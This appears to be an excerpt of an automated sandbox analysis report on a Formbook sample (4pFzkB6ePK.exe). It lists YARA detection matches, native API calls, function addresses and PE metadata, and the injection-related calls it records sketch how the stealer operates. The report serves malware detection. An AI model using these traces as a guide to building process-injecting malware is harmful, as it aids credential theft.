              Source: 2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.4pFzkB6ePK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 5.2.4pFzkB6ePK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.4pFzkB6ePK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 5.2.4pFzkB6ePK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 2.2.4pFzkB6ePK.exe.37dcbc0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 2.2.4pFzkB6ePK.exe.37dcbc0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              .NET source code contains very large stringsShow sources
              Source: 4pFzkB6ePK.exe, LogIn.csLong String: Length: 13656
              Source: 5.2.4pFzkB6ePK.exe.e40000.1.unpack, LogIn.csLong String: Length: 13656
              Source: 5.0.4pFzkB6ePK.exe.e40000.0.unpack, LogIn.csLong String: Length: 13656
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_004181B0 NtCreateFile,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_00418260 NtReadFile,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_004182E0 NtClose,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041825A NtReadFile,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_004182AB NtReadFile,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041838A NtAllocateVirtualMemory,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019799A0 NtCreateSection,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019795D0 NtClose,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979910 NtAdjustPrivilegesToken,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979540 NtReadFile,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019798F0 NtReadVirtualMemory,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979840 NtDelayExecution,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979860 NtQuerySystemInformation,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979780 NtMapViewOfSection,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019797A0 NtUnmapViewOfSection,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979FE0 NtCreateMutant,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979710 NtQueryInformationToken,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019796E0 NtFreeVirtualMemory,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979A00 NtProtectVirtualMemory,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979A20 NtResumeThread,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979A50 NtCreateFile,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979660 NtAllocateVirtualMemory,LdrInitializeThunk,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019799D0 NtCreateProcessEx,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019795F0 NtQueryInformationFile,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0197AD30 NtSetContextThread,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979520 NtWaitForSingleObject,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979950 NtQueueApcThread,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979560 NtWriteFile,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019798A0 NtWriteVirtualMemory,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979820 NtEnumerateKey,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0197B040 NtSuspendThread,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0197A3B0 NtGetContextThread,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0197A710 NtOpenProcessToken,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979B00 NtSetValueKey,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979730 NtQueryVirtualMemory,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979770 NtSetInformationFile,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0197A770 NtOpenThread,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979760 NtOpenProcess,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979A80 NtOpenDirectoryObject,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019796D0 NtCreateKey,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979610 NtEnumerateValueKey,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979A10 NtQuerySection,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979650 NtQueryValueKey,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01979670 NtQueryInformationProcess,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C395D0 NtClose,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39540 NtReadFile,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C396D0 NtCreateKey,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C396E0 NtFreeVirtualMemory,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39650 NtQueryValueKey,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39660 NtAllocateVirtualMemory,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39FE0 NtCreateMutant,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39780 NtMapViewOfSection,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39710 NtQueryInformationToken,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39840 NtDelayExecution,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39860 NtQuerySystemInformation,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C399A0 NtCreateSection,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39A50 NtCreateFile,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C395F0 NtQueryInformationFile,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39560 NtWriteFile,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39520 NtWaitForSingleObject,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C3AD30 NtSetContextThread,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39670 NtQueryInformationProcess,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39610 NtEnumerateValueKey,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C397A0 NtUnmapViewOfSection,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39760 NtOpenProcess,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C3A770 NtOpenThread,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39770 NtSetInformationFile,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C3A710 NtOpenProcessToken,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39730 NtQueryVirtualMemory,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C398F0 NtReadVirtualMemory,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C398A0 NtWriteVirtualMemory,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C3B040 NtSuspendThread,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39820 NtEnumerateKey,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C399D0 NtCreateProcessEx,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39950 NtQueueApcThread,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39A80 NtOpenDirectoryObject,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39A00 NtProtectVirtualMemory,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39A10 NtQuerySection,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39A20 NtResumeThread,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C3A3B0 NtGetContextThread,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C39B00 NtSetValueKey,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CE81B0 NtCreateFile,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CE82E0 NtClose,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CE8260 NtReadFile,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CE8390 NtAllocateVirtualMemory,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CE82AB NtReadFile,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CE825A NtReadFile,
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CE838A NtAllocateVirtualMemory,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 2_2_00A1C508
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 2_2_00A19990
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_00401030
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041A296
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041BB66
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041CB72
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041CB75
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_00408C50
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_00402D87
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_00402D90
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041B61B
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0041BEB6
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_00402FB0
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01962581
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0194D5E0
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A025DD
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0193F900
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A02D07
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01930D20
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01954120
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A01D55
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0194B090
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A020A8
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019620A0
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A028EC
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0194841F
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1002
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196EBB0
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019FDBD2
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A01FF1
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A02B28
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A022AE
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A02EF7
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01956E30
              Source: C:\Windows\explorer.exeCode function: 6_2_06427062
              Source: C:\Windows\explorer.exeCode function: 6_2_064228F9
              Source: C:\Windows\explorer.exeCode function: 6_2_064252FF
              Source: C:\Windows\explorer.exeCode function: 6_2_06423362
              Source: C:\Windows\explorer.exeCode function: 6_2_06422902
              Source: C:\Windows\explorer.exeCode function: 6_2_06425302
              Source: C:\Windows\explorer.exeCode function: 6_2_064287C7
              Source: C:\Windows\explorer.exeCode function: 6_2_064295B2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CBD466
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C0841F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC25DD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C0D5E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC1D55
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BF0D20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC2D07
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC2EF7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CBD616
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C16E30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CCDFCE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC1FF1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC28EC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C0B090
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C220A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC20A8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CB1002
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CCE824
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04BFF900
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C14120
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC22AE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CAFA2B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CB03DA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CBDBD2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C2EBB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04C1AB40
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04CC2B28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CEA296
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CECB75
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CECB72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CD8C50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CD2D87
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CD2D90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00CD2FB0
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: String function: 0193B150 appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 04BFB150 appears 45 times
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs 4pFzkB6ePK.exe
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs 4pFzkB6ePK.exe
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs 4pFzkB6ePK.exe
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs 4pFzkB6ePK.exe
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227342464.0000000000A60000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 4pFzkB6ePK.exe
              Source: 4pFzkB6ePK.exe, 00000002.00000002.226621287.00000000002F8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameServerObjectTerminatorSink.exe6 vs 4pFzkB6ePK.exe
              Source: 4pFzkB6ePK.exe, 00000002.00000002.234024022.00000000086C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs 4pFzkB6ePK.exe
              Source: 4pFzkB6ePK.exe, 00000002.00000002.233518912.0000000008500000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs 4pFzkB6ePK.exe
              Source: 4pFzkB6ePK.exe, 00000005.00000000.225714559.0000000000EB8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameServerObjectTerminatorSink.exe6 vs 4pFzkB6ePK.exe
              Source: 4pFzkB6ePK.exe, 00000005.00000002.285659789.000000000169B000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs 4pFzkB6ePK.exe
              Source: 4pFzkB6ePK.exe, 00000005.00000002.285884616.0000000001A2F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4pFzkB6ePK.exe
              Source: 4pFzkB6ePK.exeBinary or memory string: OriginalFilenameServerObjectTerminatorSink.exe6 vs 4pFzkB6ePK.exe
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
              Source: 4pFzkB6ePK.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.284397721.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000005.00000002.284397721.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000B.00000002.470152812.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000B.00000002.470152812.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000B.00000002.472397377.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000B.00000002.472397377.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000B.00000002.472184819.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000B.00000002.472184819.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.228140943.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.228140943.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.4pFzkB6ePK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 5.2.4pFzkB6ePK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.4pFzkB6ePK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 5.2.4pFzkB6ePK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.4pFzkB6ePK.exe.37dcbc0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 2.2.4pFzkB6ePK.exe.37dcbc0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 4pFzkB6ePK.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
